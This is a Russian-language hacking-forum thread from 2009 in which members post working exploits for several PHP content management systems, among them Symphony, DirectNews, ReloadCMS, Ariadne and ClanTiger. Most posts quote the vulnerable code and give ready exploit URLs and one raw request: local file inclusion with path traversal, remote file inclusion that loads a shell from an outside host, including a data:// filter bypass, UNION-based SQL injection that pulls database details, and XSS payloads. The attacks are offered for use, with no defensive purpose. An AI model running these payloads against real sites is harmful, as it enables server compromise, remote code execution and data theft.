HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Symphony CMS 2.0.6 Local File Inclusion
  #1  
Старый 12.12.2009, 14:10
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами: 9428066

Репутация: 1668
По умолчанию Symphony CMS 2.0.6 Local File Inclusion

Symphony CMS 2.0.6
Web site : http://symphony-cms.com
Version : 2.0.6


[Local File Inclusion]

Vuln file: index.php [str:9]
PHP код:
    function renderer($mode='frontend'){
        require_once(
CORE "/class.{$mode}.php");
        return (
$mode == 'administration' Administration::instance() : Frontend::instance());
    }
    
    
$renderer = (isset($_GET['mode']) ? strtolower($_GET['mode']) : 'frontend');
    
$output renderer($renderer)->display(getCurrentPage()); 
Exploit:
if magic_quotes = OFF
Код:
http://[host]/[path]/index.php?mode=/../../../../../../[local_file]%00
 
Ответить с цитированием

Уязвимости DirectNews
  #2  
Старый 11.12.2009, 16:11
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию Уязвимости DirectNews

Product: DirectNews
Author: http://www.direct-news.fr/
Version: 4.10


RFI

Необходимо для правильной работы RFI! register_globals = ON and allow_url_open = ON!

file: /admin/menu.php
PHP код:
if (empty($from_inc))
{
    
header('HTTP/1.1 403 Forbidden');
    
$rootpath '..';
    require_once (
$rootpath .'/templates/error/HTTP_FORBIDDEN.php');
     die();
}
include_once 
$rootpath .'/library/lib.menu.php';
include_once 
$rootpath .'/modules/menu/lib/treemenu.inc.php'
target:?from_inc=1&rootpath=http://yousite.ru/shellcode.txt?

file: /admin/menu_xml.php
PHP код:
include_once $rootpath .'/library/lib.menu.php';
include_once 
$rootpath .'/modules/menu/lib/treemenu.inc.php'
target:?rootpath=http://yousite.ru/shellcode.txt?

file: /inc.php
PHP код:
if (empty($from_inc))
{
    
header('HTTP/1.1 403 Forbidden');
     
$rootpath '../..';
    require_once (
'../../templates/error/HTTP_FORBIDDEN.php');
     die();
}

include_once 
$rootpath .'/modules/menu/lib/PHPLIB.php';
include_once 
$rootpath .'/modules/menu/lib/layersmenu-common.inc.php';
include_once 
$rootpath .'/library/lib.menu.php'
Как видно,проверяеться наличие конфига,и только после - инклуд.Заинклудить из http:// неполучиться,зато file_exists(); отлично работает с ftp
target:?rootpath=ftp://userassword@yaouftp.ru/shellcode.txt?

file: /modules/menu/menu_layer.php
PHP код:
if (empty($from_inc))
{
    
header('HTTP/1.1 403 Forbidden');
     
$rootpath '../..';
    require_once (
'../../templates/error/HTTP_FORBIDDEN.php');
     die();
}

include_once 
$rootpath .'/modules/menu/lib/PHPLIB.php';
include_once 
$rootpath .'/modules/menu/lib/layersmenu-common.inc.php';
include_once 
$rootpath .'/library/lib.menu.php'
Тут попроще.
target:?from_inc=3&rootpath=http://yousite.ru/shellcode.txt?


file: /admin/inc.php
PHP код:
i$from_inc true

header("Content-Type: text/html; charset=utf-8");

if (!
file_exists($rootpath .'/config.php')) {
    
header('Location: '$adminroot .'/install/');
    die();
}

// Compatibilite entre les versions de PHP
require_once $rootpath .'/library/lib.compatibility.php';

// gestion de session
require_once $rootpath .'/library/class.config.php';
require_once 
$rootpath .'/modules/panier/class.panier_article.php'
Как видно,проверяеться наличие конфига,и только после - инклуд.Заинклудить из http:// неполучиться,зато file_exists(); отлично работает с ftp
target:?rootpath=ftp://userassword@yaouftp.ru/shellcode.txt?

Blind SQL-inj

file: /index.php
PHP код:
if (isset($_GET['lang']))
{
    
$_SESSION[DN_UID]['lg'] = $_GET['lang'];
}
else
{
    
$_SESSION[DN_UID]['lg'] = $_GET['lg'];
}

$lg $_SESSION[DN_UID]['lg'];

$requete 'SELECT code 
            FROM '
$name_table_language .
            WHERE code = "'
$lg .'" 
            AND site = "1"'
;
$resultat mysql_query($requete); 
target:В таблие 7 полей ?lang=1'+union+select+1,2,3,4,5,7/*

file: /modules/ajax/remote.php
PHP код:
if (isset($_POST['ajax']))
{
    switch (
$_POST['ajax'])
    {
        case 
'showComments' :
                            print(
showComments($_POST));
            break;
        case 
'postComment'    :
                            print(
postComment($_POST));
            break;
        default : print(
true);
            break;
    }
}
/
Функция/
function 
postComment($post)
{
    global 
$rootpath$lg$name_table_commentaires;
    
    if (!empty(
$post['noMessage']))
    {
        
$author            = !empty($post['author']) ? $post['author'] : '';
        
$email            = !empty($post['email']) ? $post['email'] : '';
        
$url            = !empty($post['url']) ? $post['url'] : '';
        
$text_comment    = !empty($post['text_comment']) ? $post['text_comment'] : '';
        
        
$tri            getSqlValue('SELECT MAX(tri) + 1 FROM '$name_table_commentaires .' WHERE noMessage = '$post['noMessage']); 
target:9 columns

Последний раз редактировалось m0Hze; 11.12.2009 в 16:19..
 
Ответить с цитированием

  #3  
Старый 20.12.2009, 15:16
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию

Direct News, основная часть выше,изза переноса сообщения раззлетелись
RFI

Необходимо для правильной работы RFI! register_globals = ON and allow_url_open = ON!

file: /admin/inc.php
PHP код:
$from_inc true

header("Content-Type: text/html; charset=utf-8");

if (!
file_exists($rootpath .'/config.php')) {
    
header('Location: '$adminroot .'/install/');
    die();
}

// Compatibilite entre les versions de PHP
require_once $rootpath .'/library/lib.compatibility.php';

// gestion de session
require_once $rootpath .'/library/class.config.php';
require_once 
$rootpath .'/modules/panier/class.panier_article.php';
.... 
target:admin/inc.php?rootpath=http://yousite.ru/shellcode.txt?

Последний раз редактировалось m0Hze; 20.12.2009 в 19:00..
 
Ответить с цитированием

  #4  
Старый 12.12.2009, 15:30
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами: 8954306

Репутация: 1588
По умолчанию

BareNuked CMS v. 1.1.0
CMS = BareNuked CMS

SQL injection
url - http://localhost/index.php?term=
Exploit -
Код:
http://localhost/index.php?term=1'/**/and/**/1=0/**/union/**/all/**/select/**/0,concat(0x76657273696f6e0d0a,0x3a,version()),0,0,2,0,0,0,0,0,0,0--+&search=search
Passive XSS
search ===> "><script>alert();</script>
or
Exploit -
Код:
http://localhost/?term="><script>alert();</script>&search=search
NooMS

Passive XSS
Exploit -
Код:
http://localhost/search.php?q="><script>alert();</script>
SQL injection in admin panel
Exploit
Код:
http://localhost/admin.php?op=comments&action=listarticles&section_id=1/**/and/**/1=0/**/union/**/all/**/select/**/1,concat_ws(char(42,42,42),user(),database(),version()),3,4,5,6,7,8,9
 
Ответить с цитированием

  #5  
Старый 12.12.2009, 21:14
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию

Product: ReloadCMS
Author: http://reloadcms.com/
Version: 1.2.7

LFI

file: rss.php
PHP код:
if(!empty($_GET['m']) &&  !empty($system->config['enable_rss']) && !empty($system->feeds[$_GET['m']])){
    
$module $_GET['m'];
    
header('Content-Type: text/xml');
    
$feed = new rss_feed($system->config['title'] . ' - ' $system->feeds[$module][0], $system->url$system->feeds[$module][1], $system->config['encoding'], $system->config['language'], $system->config['copyright']);
    
$m = (!empty($system->feeds[$module][2])) ? $system->feeds[$module][2] : $module;
    if(
is_readable(MODULES_PATH $m '/rss.php')) include(MODULES_PATH $m '/rss.php'); 
target: ?m=../../config/config.ini%00
 
Ответить с цитированием

  #6  
Старый 12.12.2009, 23:27
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами: 8954306

Репутация: 1588
По умолчанию

Product: PicoFlatCMS
Version: 0.6.1
Exploit:
Код:
http://localhost/index.php?pagina=[file]
 
Ответить с цитированием

  #7  
Старый 12.12.2009, 23:54
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию

Product: Ariadne CMS
Author: http://www.ariadne-cms.org/
Version: 2.6.1
RFI

Need: register_globals = ON and allow_url_include = ON

file: /winges/tree/root.php
PHP код:
  if (!isset($layout) || (!$layout)) {
    
$layout="./frames.js";
  } else {
    
$layout=ereg_replace("[\./\\]","",$layout).".js";
  }
  include(
$layout); 
По сути есть фильтр,но Ctacok научил юзать data://, поэтому обход прост.
target: ?layout=data:,<?php include $_GET[hello] ?>&hello=http://yousite.com/shell.txt?

Последний раз редактировалось m0Hze; 13.12.2009 в 00:16..
 
Ответить с цитированием

  #8  
Старый 13.12.2009, 00:11
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

^^ еще версия PHP >= 5.2.0
и не allow_url_open, а allow_url_include

Последний раз редактировалось Spyder; 13.12.2009 в 00:15..
 
Ответить с цитированием

  #9  
Старый 13.12.2009, 00:22
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами: 8954306

Репутация: 1588
По умолчанию

Product - ZAKRZAK
Version - 0.01
Active XSS
Url - http://localhost/index.php?page=gbook
Exploit
Код:
'"/><script>alert("xss");</script>
Раскрытые Пути
Код:
http://localhost/index.php?page=settings&part[]=
 
Ответить с цитированием

ClanTiger CMS 1.0<=1.1.3 Local File Inclusion
  #10  
Старый 13.12.2009, 18:16
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами: 9428066

Репутация: 1668
По умолчанию ClanTiger CMS 1.0<=1.1.3 Local File Inclusion

ClanTiger CMS
Web site : http://www.clantiger.com
Vesrion : 1.0<=1.1.3


[Local File Inclusion]

Vuln file: functions/class.language.php [str:73]
PHP код:
        if(isset($_GET['lang']))
        {
            
$selectedLanguage $_GET['lang'];
        }
        else if(
$_COOKIE['lang'])
        {
            
$selectedLanguage $_COOKIE['lang'];
        }
        else
        {
            
// resort to default
            
$selectedLanguage $settings['language'];
        }
        
        
// see whether the language exists
        
if(!in_array($selectedLanguage,$this->validLanguages,true))
        {
            
$this->selectedLanguage $this->validLanguages[$settings['language']];
        }
        else
        {
            
$this->selectedLanguage $this->validLanguages[$selectedLanguage];
        }
        
        
        
// attempt to load in the translations file
        
if(!@include_once(ROOTPATH 'language/' strtolower($selectedLanguage) . '.php')) 
Exploit #1:
Код:
http://[host]/[path]/index.php?lang=../../../../../../../[local_file]%00
Exploit #2:
Код:
GET http://[host]/[path]/index.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: [host]
Content-Length: 59
Connection: Close
Cookie: lang=../../../../../../../[local_file]%00
Для успешной эксплуатации необходимо:
magic quotes = OFF
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.